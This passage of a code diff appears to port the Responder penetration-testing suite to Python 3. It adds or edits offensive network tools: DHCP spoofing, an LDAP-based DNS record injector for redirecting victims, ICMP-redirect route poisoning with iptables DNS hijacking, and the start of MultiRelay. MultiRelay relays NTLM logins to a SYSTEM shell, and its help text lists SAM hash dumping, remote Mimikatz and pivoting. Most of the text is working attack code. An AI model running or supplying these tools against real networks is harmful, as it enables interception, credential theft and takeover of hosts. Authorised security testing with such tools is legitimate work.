+                IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)).decode('latin-1'), DstIP=IP.decode('latin-1'))
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
+                return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
+
+    elif OpCode == b"\x01" and Respond_To_Requests:  # DHCP Discover
+        IP = FindIP(data)
+        if IP:
+            IPConv = socket.inet_ntoa(IP)
+            if RespondToThisIP(IPConv):
+                IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
+                Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
+                Packet.calculate()
+                Buffer = UDP(Data = Packet)
+                Buffer.calculate()
+                SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
+                return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)

 def SendDHCP(packet,Host):
-	s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
-	s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
-	s.sendto(packet, Host)
+    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
+    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
+    s.sendto(NetworkSendBufferPython2or3(packet), Host)

 if __name__ == "__main__":
-	s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
-	s.bind((Interface, 0x0800))
+    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
+    s.bind((Interface, 0x0800))

-	while True:
-		try:
-			data = s.recvfrom(65535)
-			if data[0][23:24] == "\x11":  # is udp?
-				SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
+    while True:
+        try:
+            data = s.recvfrom(65535)
+            if data[0][23:24] == b"\x11":  # is udp?
+                SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)

-				if SrcPort == 67 or DstPort == 67:
-					ret = ParseDHCPCode(data[0][42:])
-					if ret:
-						print text("[DHCP] %s" % ret)
-
-		except KeyboardInterrupt:
-			sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
+                if SrcPort == 67 or DstPort == 67:
+                    ret = ParseDHCPCode(data[0][42:])
+                    if ret:
+                        print(text("[DHCP] %s" % ret))

+        except KeyboardInterrupt:
+            sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
--- a/tools/DHCP_Auto.sh
+++ b/tools/DHCP_Auto.sh
--- a/tools/DNSUpdate.py
+++ b/tools/DNSUpdate.py
@@ -0,0 +1,185 @@
+#!/usr/bin/env python
+
+import sys
+import argparse
+import getpass
+import re
+import socket
+from impacket.structure import Structure
+import ldap3
+import dns.resolver
+from collections import defaultdict
+
+
+class DNS_RECORD(Structure):
+    """
+    dnsRecord - used in LDAP [MS-DNSP] section 2.3.2.2
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('DataLength', '<H-Data'),
+        ('Type', '<H'),
+        ('Version', 'B=5'),
+        ('Rank', 'B'),
+        ('Flags', '<H=0'),
+        ('Serial', '<L'),
+        ('TtlSeconds', '>L'),
+        ('Reserved', '<L=0'),
+        ('TimeStamp', '<L=0'),
+        ('Data', ':')
+    )
+
+
+class DNS_RPC_RECORD_A(Structure):
+    """
+    DNS_RPC_RECORD_A [MS-DNSP] section 2.2.2.2.4.1
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('address', ':'),
+    )
+
+class DNS_RPC_RECORD_TS(Structure):
+    """
+    DNS_RPC_RECORD_TS [MS-DNSP] section 2.2.2.2.4.23
+    impacket based structure, all of the below are tuples in format (fieldName, format)
+    """
+    structure = (
+        ('entombedTime', '<Q'),
+    )
+
+def getserial(server, zone):
+    dnsresolver = dns.resolver.Resolver()
+    try:
+        socket.inet_aton(server)
+        dnsresolver.nameservers = [server]
+    except socket.error:
+        pass
+    res = dnsresolver.query(zone, 'SOA')
+    for answer in res:
+        return answer.serial + 1
+
+def new_A_record(type, serial):
+    nr = DNS_RECORD()
+    nr['Type'] = type
+    nr['Serial'] = serial
+    nr['TtlSeconds'] = 180
+    nr['Rank'] = 240
+    return nr
+
+ddict1 = defaultdict(list)
+
+parser = argparse.ArgumentParser(description='Add/ Remove DNS records for an effective pawning with responder')
+    
+parser.add_argument("-DNS", type=str,help="IP address of the DNS server/ Domain Controller to connect to")
+parser.add_argument("-u","--user",type=str,help="Domain\\Username for authentication.")
+parser.add_argument("-p","--password",type=str,help="Password or LM:NTLM hash, will prompt if not specified")
+parser.add_argument("-a", "--action", type=str, help="ad, rm, or an: add, remove, analyze")
+parser.add_argument("-r", "--record", type=str, help="DNS record name")
+parser.add_argument("-d", "--data", help="The IP address of attacker machine")
+parser.add_argument("-l", "--logfile", type=str, help="The log file of Responder in analyze mode")
+
+
+
+args = parser.parse_args()
+#Checking Username and Password
+if args.user is not None:
+    if not '\\' in args.user:
+        print('Username must include a domain, use: Domain\\username')
+        sys.exit(1)
+    if args.password is None:
+        args.password = getpass.getpass()
+
+#Check the required arguments
+if args.action in ['ad', 'rm']:
+    if args.action == 'ad' and not args.record:
+        flag = input("No record provided, Enter 'Y' to add a Wildcard record: ")
+        if flag.lower() == 'y' or flag.lower() == 'yes':
+            recordname = "*"
+        else:
+            sys.exit(1)     
+    else:
+        recordname = args.record
+    if args.action == 'ad' and not args.data:
+        print("Provide an IP address with argument -d")
+        sys.exit(1)
+    if args.action == "rm" and not args.record:
+        print("No record provided to be deleted")
+elif args.action == "an":
+    if args.logfile:
+        with open(args.logfile) as infile:
+            for lline in infile:
+                templist = lline.split(":")
+                tempIP = templist[2].split( )[0]
+                tempRecord = templist[3].split( )[0]
+                ddict1[tempRecord].append(tempIP)
+        infile.close()
+        for k,v in ddict1.items():
+            print("The request %s was made by %s hosts" % (k, len(set(v))))
+        sys.exit(0)
+    else:
+        print("Provide a log file from responder session in analyze mode")
+        sys.exit(1)
+else:
+    print("Choose one of the three actions")
+    sys.exit(1)
+
+#inital connection
+dnserver = ldap3.Server(args.DNS, get_info=ldap3.ALL)
+print('Connecting to host...')
+con = ldap3.Connection(dnserver, user=args.user, password=args.password, authentication=ldap3.NTLM)
+print('Binding to host')
+# Binding with the user context 
+if not con.bind():
+    print('Bind failed, Check the Username and Password')
+    print(con.result)
+    sys.exit(1)
+print('Bind OK')
+
+#Configure DN for the record, gather domainroot, dnsroot, zone
+domainroot = dnserver.info.other['defaultNamingContext'][0]
+dnsroot = 'CN=MicrosoftDNS,DC=DomainDnsZones,%s' % domainroot
+zone = re.sub(',DC=', '.', domainroot[domainroot.find('DC='):], flags=re.I)[3:]
+if recordname.lower().endswith(zone.lower()):
+    recordname = recordname[:-(len(zone)+1)]
+record_dn = 'DC=%s,DC=%s,%s' % (recordname, zone, dnsroot)
+
+if args.action == 'ad':
+    record = new_A_record(1, getserial(args.DNS, zone))
+    record['Data'] = DNS_RPC_RECORD_A()
+    record['Data'] = socket.inet_aton(args.data)
+
+    #Adding the data to record object
+    recorddata = {
+        #'objectClass': ['top', 'dnsNode'],
+        'dNSTombstoned': False,
+        'name': recordname,
+        'dnsRecord': [record.getData()]
+        }
+    objectClass = ['top', 'dnsNode']
+
+    print('Adding the record')
+
+    con.add(record_dn, objectClass, recorddata)
+    #con.add(record_dn, ['top', 'dnsNode'], recorddata)
+    print(con.result)
+
+elif args.action == 'rm':
+    #searching for the record
+    searchbase = 'DC=%s,%s' % (zone, dnsroot)
+    con.search(searchbase, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(recordname), attributes=['dnsRecord','dNSTombstoned','name'])
+    if len(con.response) != 0:
+        for entry in con.response:
+            if entry['type'] != 'searchResEntry':
+                print("Provided record does not exists")
+                sys.exit(1)
+            else:
+                record_dn = entry['dn']
+                print(entry['raw_attributes']['dnsRecord'])
+    else:
+        print("Provided record does not exists")
+
+    con.delete(record_dn)
+    if con.result['description'] == "success":
+        print("Record deleted successfully")
+        
--- a/tools/FindSMB2UPTime.py
+++ b/tools/FindSMB2UPTime.py
@@ -1,68 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys
-import os
-import datetime
-import struct
-import socket
-
-sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..')))
-from packets import SMB2Header, SMB2Nego, SMB2NegoData
-
-def GetBootTime(data):
-    Filetime = int(struct.unpack('<q',data)[0])
-    t = divmod(Filetime - 116444736000000000, 10000000)
-    time = datetime.datetime.fromtimestamp(t[0])
-    return time, time.strftime('%Y-%m-%d %H:%M:%S')
-
-
-def IsDCVuln(t):
-    Date = datetime.datetime(2014, 11, 17, 0, 30)
-    if t[0] < Date:
-       print "DC is up since:", t[1]
-       print "This DC is vulnerable to MS14-068"
-    print "DC is up since:", t[1]
-
-
-def run(host):
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(host)  
-    s.settimeout(5) 
-
-    Header = SMB2Header(Cmd="\x72",Flag1="\x18",Flag2="\x53\xc8")
-    Nego = SMB2Nego(Data = SMB2NegoData())
-    Nego.calculate()
-
-    Packet = str(Header)+str(Nego)
-    Buffer = struct.pack(">i", len(Packet)) + Packet
-    s.send(Buffer)
-
-    try:
-        data = s.recv(1024)
-        if data[4:5] == "\xff":
-           print "This host doesn't support SMBv2" 
-        if data[4:5] == "\xfe":
-           IsDCVuln(GetBootTime(data[116:124]))
-    except Exception:
-        s.close()
-        raise
-
-if __name__ == "__main__":
-    if len(sys.argv)<=1:
-        sys.exit('Usage: python '+sys.argv[0]+' DC-IP-address')
-    host = sys.argv[1],445
-    run(host)
--- a/tools/FindSQLSrv.py
+++ b/tools/FindSQLSrv.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -16,25 +16,23 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from socket import *

-print 'MSSQL Server Finder 0.1'
+print('MSSQL Server Finder 0.3')

 s = socket(AF_INET,SOCK_DGRAM)
 s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
-s.settimeout(2)
-s.sendto('\x02',('255.255.255.255',1434))
+s.settimeout(5)
+s.sendto(b'\x02',('255.255.255.255',1434))

 try:
-   while 1:
-      data, address = s.recvfrom(8092)
-      if not data:
-         break
-      else:
-         print "==============================================================="
-         print "Host details:",address[0]
-         print data[2:]
-         print "==============================================================="
-         print ""
+    while 1:
+        data, address = s.recvfrom(8092)
+        if not data:
+            break
+        else:
+            print("===============================================================")
+            print(("Host details: %s"%(address[0])))
+            print((data[2:]).decode('latin-1'))
+            print("===============================================================")
+            print("")
 except:
-   pass
-
-
+    pass
--- a/tools/Icmp-Redirect.py
+++ b/tools/Icmp-Redirect.py
@@ -1,5 +1,5 @@
 #!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
+# This file is part of Responder, a network take-over set of tools
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
 # This program is free software: you can redistribute it and/or modify
@@ -19,14 +19,16 @@ import struct
 import optparse
 import pipes
 import sys
+import codecs
 from socket import *
 sys.path.append('../')
 from odict import OrderedDict
 from random import randrange
 from time import sleep
 from subprocess import call
-from packets import Packet

+if (sys.version_info < (3, 0)):
+   sys.exit('This script is meant to be run with Python3')
 parser = optparse.OptionParser(usage='python %prog -I eth0 -i 10.20.30.40 -g 10.20.30.254 -t 10.20.30.48 -r 10.20.40.1',
                               prog=sys.argv[0],
                               )
@@ -40,23 +42,23 @@ parser.add_option('-a', '--alternate',action="store", help="The alternate gatewa
 options, args = parser.parse_args()

 if options.OURIP is None:
-    print "-i mandatory option is missing.\n"
+    print("-i mandatory option is missing.\n")
    parser.print_help()
    exit(-1)
 elif options.OriginalGwAddr is None:
-    print "-g mandatory option is missing, please provide the original gateway address.\n"
+    print("-g mandatory option is missing, please provide the original gateway address.\n")
    parser.print_help()
    exit(-1)
 elif options.VictimIP is None:
-    print "-t mandatory option is missing, please provide a target.\n"
+    print("-t mandatory option is missing, please provide a target.\n")
    parser.print_help()
    exit(-1)
 elif options.Interface is None:
-    print "-I mandatory option is missing, please provide your network interface.\n"
+    print("-I mandatory option is missing, please provide your network interface.\n")
    parser.print_help()
    exit(-1)
 elif options.ToThisHost is None:
-    print "-r mandatory option is missing, please provide a destination target.\n"
+    print("-r mandatory option is missing, please provide a destination target.\n")
    parser.print_help()
    exit(-1)

@@ -78,13 +80,53 @@ def Show_Help(ExtraHelpData):

 MoreHelp = "Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)

+#Python version
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+
+def StructWithLenPython2or3(endian,data):
+    #Python2...
+    if PY2OR3 == "PY2":
+        return struct.pack(endian, data)
+    #Python3...
+    else:
+        return struct.pack(endian, data).decode('latin-1')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return str(data.decode('latin-1'))
+
 def GenCheckSum(data):
    s = 0
    for i in range(0, len(data), 2):
        q = ord(data[i]) + (ord(data[i+1]) << 8)
        f = s + q
        s = (f & 0xffff) + (f >> 16)
-    return struct.pack("<H",~s & 0xffff)
+    return StructWithLenPython2or3("<H",~s & 0xffff)
+
+class Packet():
+	fields = OrderedDict([
+		("data", ""),
+	])
+	def __init__(self, **kw):
+		self.fields = OrderedDict(self.__class__.fields)
+		for k,v in kw.items():
+			if callable(v):
+				self.fields[k] = v(self.fields[k])
+			else:
+				self.fields[k] = v
+	def __str__(self):
+		return "".join(map(str, self.fields.values()))

 #####################################################################
 #ARP Packets
@@ -110,8 +152,8 @@ class ARPWhoHas(Packet):
    ])

    def calculate(self):
-        self.fields["DstIP"] = inet_aton(self.fields["DstIP"])
-        self.fields["SenderIP"] = inet_aton(OURIP)
+        self.fields["DstIP"] = inet_aton(self.fields["DstIP"]).decode('latin-1')
+        self.fields["SenderIP"] = inet_aton(OURIP).decode('latin-1')

 #####################################################################
 #ICMP Redirect Packets
@@ -141,11 +183,11 @@ class IPPacket(Packet):

    def calculate(self):
        self.fields["TID"] = chr(randrange(256))+chr(randrange(256))
-        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"]))
-        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"]))
+        self.fields["SrcIP"] = inet_aton(str(self.fields["SrcIP"])).decode('latin-1')
+        self.fields["DestIP"] = inet_aton(str(self.fields["DestIP"])).decode('latin-1')
        # Calc Len First
        CalculateLen = str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])+str(self.fields["Data"])
-        self.fields["Len"] = struct.pack(">H", len(CalculateLen))
+        self.fields["Len"] = StructWithLenPython2or3(">H", len(CalculateLen))
        # Then CheckSum this packet
        CheckSumCalc =str(self.fields["VLen"])+str(self.fields["DifField"])+str(self.fields["Len"])+str(self.fields["TID"])+str(self.fields["Flag"])+str(self.fields["FragOffset"])+str(self.fields["TTL"])+str(self.fields["Cmd"])+str(self.fields["CheckSum"])+str(self.fields["SrcIP"])+str(self.fields["DestIP"])
        self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)
@@ -160,7 +202,7 @@ class ICMPRedir(Packet):
    ])

    def calculate(self):
-        self.fields["GwAddr"] = inet_aton(OURIP)
+        self.fields["GwAddr"] = inet_aton(OURIP).decode('latin-1')
        CheckSumCalc =str(self.fields["Type"])+str(self.fields["OpCode"])+str(self.fields["CheckSum"])+str(self.fields["GwAddr"])+str(self.fields["Data"])
        self.fields["CheckSum"] = GenCheckSum(CheckSumCalc)

@@ -177,27 +219,27 @@ def ReceiveArpFrame(DstAddr):
    s.settimeout(5)
    Protocol = 0x0806
    s.bind((Interface, Protocol))
-    OurMac = s.getsockname()[4]
+    OurMac = s.getsockname()[4].decode('latin-1')
    Eth = EthARP(SrcMac=OurMac)
    Arp = ARPWhoHas(DstIP=DstAddr,SenderMac=OurMac)
    Arp.calculate()
    final = str(Eth)+str(Arp)
    try:
-        s.send(final)
+        s.send(NetworkSendBufferPython2or3(final))
        data = s.recv(1024)
        DstMac = data[22:28]
-        DestMac = DstMac.encode('hex')
-        PrintMac = ":".join([DestMac[x:x+2] for x in xrange(0, len(DestMac), 2)])
-        return PrintMac,DstMac
+        DestMac = codecs.encode(DstMac, 'hex')
+        PrintMac = ":".join([DestMac[x:x+2].decode('latin-1') for x in range(0, len(DestMac), 2)])
+        return PrintMac,DstMac.decode('latin-1')
    except:
-        print "[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)
+        print("[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr))
        exit(1)

 def IcmpRedirectSock(DestinationIP):
    PrintMac,DestMac = ReceiveArpFrame(VictimIP)
-    print '[ARP]Target Mac address is :',PrintMac
+    print('[ARP]Target Mac address is :',PrintMac)
    PrintMac,RouterMac = ReceiveArpFrame(OriginalGwAddr)
-    print '[ARP]Router Mac address is :',PrintMac
+    print('[ARP]Router Mac address is :',PrintMac)
    s = socket(AF_PACKET, SOCK_RAW)
    Protocol = 0x0800
    s.bind((Interface, Protocol))
@@ -209,12 +251,12 @@ def IcmpRedirectSock(DestinationIP):
    IPPack = IPPacket(SrcIP=OriginalGwAddr,DestIP=VictimIP,TTL="\x40",Data=str(ICMPPack))
    IPPack.calculate()
    final = str(Eth)+str(IPPack)
-    s.send(final)
-    print '\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP)
+    s.send(NetworkSendBufferPython2or3(final))
+    print('\n[ICMP]%s should have been poisoned with a new route for target: %s.\n'%(VictimIP,DestinationIP))

 def FindWhatToDo(ToThisHost2):
    if ToThisHost2 != None:
-        Show_Help('Hit CRTL-C to kill this script')
+        Show_Help('Hit CTRL-C to kill this script')
        RunThisInLoop(ToThisHost, ToThisHost2,OURIP)
    if ToThisHost2 == None:
        Show_Help(MoreHelp)
@@ -227,11 +269,11 @@ def RunThisInLoop(host, host2, ip):
    ouripadd = pipes.quote(ip)
    call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns1+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
    call("iptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst "+dns2+" --dport 53 -j DNAT --to-destination "+ouripadd+":53", shell=True)
-    print "[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers."
+    print("[+]Automatic mode enabled\nAn iptable rules has been added for both DNS servers.")
    while True:
        IcmpRedirectSock(DestinationIP=dns1)
        IcmpRedirectSock(DestinationIP=dns2)
-        print "[+]Repoisoning the target in 8 minutes..."
+        print("[+]Repoisoning the target in 8 minutes...")
        sleep(480)

 FindWhatToDo(ToThisHost2)
--- a/tools/MultiRelay.py
+++ b/tools/MultiRelay.py
@@ -0,0 +1,853 @@
+#!/usr/bin/env python
+# -*- coding: latin-1 -*-
+# This file is part of Responder, a network take-over set of tools
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import sys
+if (sys.version_info > (3, 0)):
+    PY2OR3     = "PY3"
+else:
+    PY2OR3  = "PY2"
+    sys.exit("For now MultiRelay only supports python 3. Try python3 MultiRelay.py ...")
+import re
+import os
+import logging
+import optparse
+import time
+import random
+import subprocess
+from threading import Thread
+if PY2OR3 == "PY3":
+    from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+else:
+    from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
+
+try:
+    from Crypto.Hash import MD5
+except ImportError:
+    print("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
+    print("You can install it on debian based os with this command: apt-get install python-crypto")
+    print("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
+try:
+    import readline
+except:
+    print("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
+    pass
+from MultiRelay.RelayMultiPackets import *
+from MultiRelay.RelayMultiCore import *
+from SMBFinger.Finger import RunFinger,ShowSigning,RunPivotScan
+sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
+from socket import *
+
+__version__ = "2.5"
+
+
+MimikatzFilename    = "./MultiRelay/bin/mimikatz.exe"
+Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"
+RunAsFileName       = "./MultiRelay/bin/Runas.exe"
+SysSVCFileName      = "./MultiRelay/bin/Syssvc.exe"
+
+def color(txt, code = 1, modifier = 0):
+    return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
+
+if os.path.isfile(SysSVCFileName) is False:
+   print(color("[!]MultiRelay/bin/ folder is empty. You need to run these commands:\n",1,1))
+   print(color("apt-get install gcc-mingw-w64-x86-64",2,1))
+   print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv",2,1))
+   print(color("x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode",2,1))
+   print(color("\nAdditionally, you can add your custom mimikatz executables (mimikatz.exe and mimikatz_x86.exe)\nin the MultiRelay/bin/ folder for the mimi32/mimi command.",3,1))
+   sys.exit()
+
+def UserCallBack(op, value, dmy, parser):
+    args=[]
+    for arg in parser.rargs:
+        if arg[0] != "-":
+            args.append(arg)
+        if arg[0] == "-":
+            break
+    if getattr(parser.values, op.dest):
+        args.extend(getattr(parser.values, op.dest))
+    setattr(parser.values, op.dest, args)
+
+parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
+parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
+parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
+parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
+parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
+parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
+
+options, args = parser.parse_args()
+
+if options.TARGET is None:
+    print("\n-t Mandatory option is missing, please provide a target.\n")
+    parser.print_help()
+    exit(-1)
+if options.UserToRelay is None:
+    print("\n-u Mandatory option is missing, please provide a username to relay.\n")
+    parser.print_help()
+    exit(-1)
+if options.ExtraPort is None:
+    options.ExtraPort = 0
+
+if not os.geteuid() == 0:
+    print(color("[!] MultiRelay must be run as root."))
+    sys.exit(-1)
+
+OneCommand       = options.OneCommand
+Dump             = options.Dump
+ExtraPort        = options.ExtraPort
+UserToRelay      = options.UserToRelay
+
+Host             = [options.TARGET]
+Cmd              = []
+ShellOpen        = []
+Pivoting         = [2]
+
+def ShowWelcome():
+    print(color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
+    print('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
+    print('Usernames to relay (-u) are case sensitive.')
+    print('To kill this script hit CTRL-C.\n')
+    print(color('/*',8,1))
+    print('Use this script in combination with Responder.py for best results.')
+    print('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
+    print('This tool listen on TCP port 80, 3128 and 445.')
+    print('For optimal pwnage, launch Responder only with these 2 options:')
+    print('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
+    print('If you do so, use taskkill (as system) to kill the process.')
+    print(color('*/',8,1))
+    print(color('\nRelaying credentials for these users:',8,1))
+    print(color(UserToRelay,4,1))
+    print('\n')
+
+
+ShowWelcome()
+
+def ShowHelp():
+    print(color('Available commands:',8,0))
+    print(color('dump',8,1)+'               -> Extract the SAM database and print hashes.')
+    print(color('regdump KEY',8,1)+'        -> Dump an HKLM registry key (eg: regdump SYSTEM)')
+    print(color('read Path_To_File',8,1)+'  -> Read a file (eg: read /windows/win.ini)')
+    print(color('get  Path_To_File',8,1)+'  -> Download a file (eg: get users/administrator/desktop/password.txt)')
+    print(color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
+    print(color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
+    print(color('runas  Command',8,1)+'     -> Run a command as the currently logged in user. (eg: runas whoami)')
+    print(color('scan /24',8,1)+'           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
+    print(color('pivot  IP address',8,1)+'  -> Connect to another host (eg: pivot 10.0.0.12)')
+    print(color('mimi  command',8,1)+'      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
+    print(color('mimi32  command',8,1)+'    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
+    print(color('lcmd  command',8,1)+'      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
+    print(color('help',8,1)+'               -> Print this message.')
+    print(color('exit',8,1)+'               -> Exit this shell and return in relay mode.')
+    print('                      If you want to quit type exit and then use CTRL-C\n')
+    print(color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
+
+Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
+Logs = logging
+Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
+
+def NetworkSendBufferPython2or3(data):
+    if PY2OR3 == "PY2":
+        return str(data)
+    else:
+        return bytes(str(data), 'latin-1')
+
+def NetworkRecvBufferPython2or3(data):
+	if PY2OR3 == "PY2":
+		return str(data)
+	else:
+		return str(data.decode('latin-1'))
+
+def StructPython2or3(endian,data):
+	#Python2...
+	if PY2OR3 == "PY2":
+		return struct.pack(endian, len(data))
+	#Python3...
+	else:
+		return struct.pack(endian, len(data)).decode('latin-1')
+
+def UploadContent(File):
+    with open(File,'rb') as f:
+        s = f.read()
+    FileLen = len(s.decode('latin-1'))
+    FileContent = s.decode('latin-1')
+    return FileLen, FileContent
+
+try:
+    RunFinger(Host[0])
+except:
+    raise
+    print("The host %s seems to be down or port 445 down."%(Host[0]))
+    sys.exit(1)
+
+
+def get_command():
+    global Cmd
+    Cmd = []
+    while any(x in Cmd for x in Cmd) is False:
+        Cmd = [input("C:\\Windows\\system32\\:#")]
+
+#Function used to make sure no connections are accepted while we have an open shell.
+#Used to avoid any possible broken pipe.
+def IsShellOpen():
+    #While there's nothing in our array return false.
+    if any(x in ShellOpen for x in ShellOpen) is False:
+        return False
+    #If there is return True.
+    else:
+        return True
+
+#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
+def IsPivotOn():
+    #While there's nothing in our array return false.
+    if Pivoting[0] == "2":
+        return False
+    #If there is return True.
+    if Pivoting[0] == "1":
+        print("pivot is on")
+        return True
+
+def ConnectToTarget():
+    try:
+        s = socket(AF_INET, SOCK_STREAM)
+        s.connect((Host[0],445))
+        return s
+    except:
+        try:
+            sys.exit(1)
+            print("Cannot connect to target, host down?")
+        except:
+            pass
+
+class HTTPProxyRelay(BaseRequestHandler):
+
+    def handle(self):
+        try:
+            #Don't handle requests while a shell is open. That's the goal after all.
+            if IsShellOpen():
+                return None
+            if IsPivotOn():
+                return None
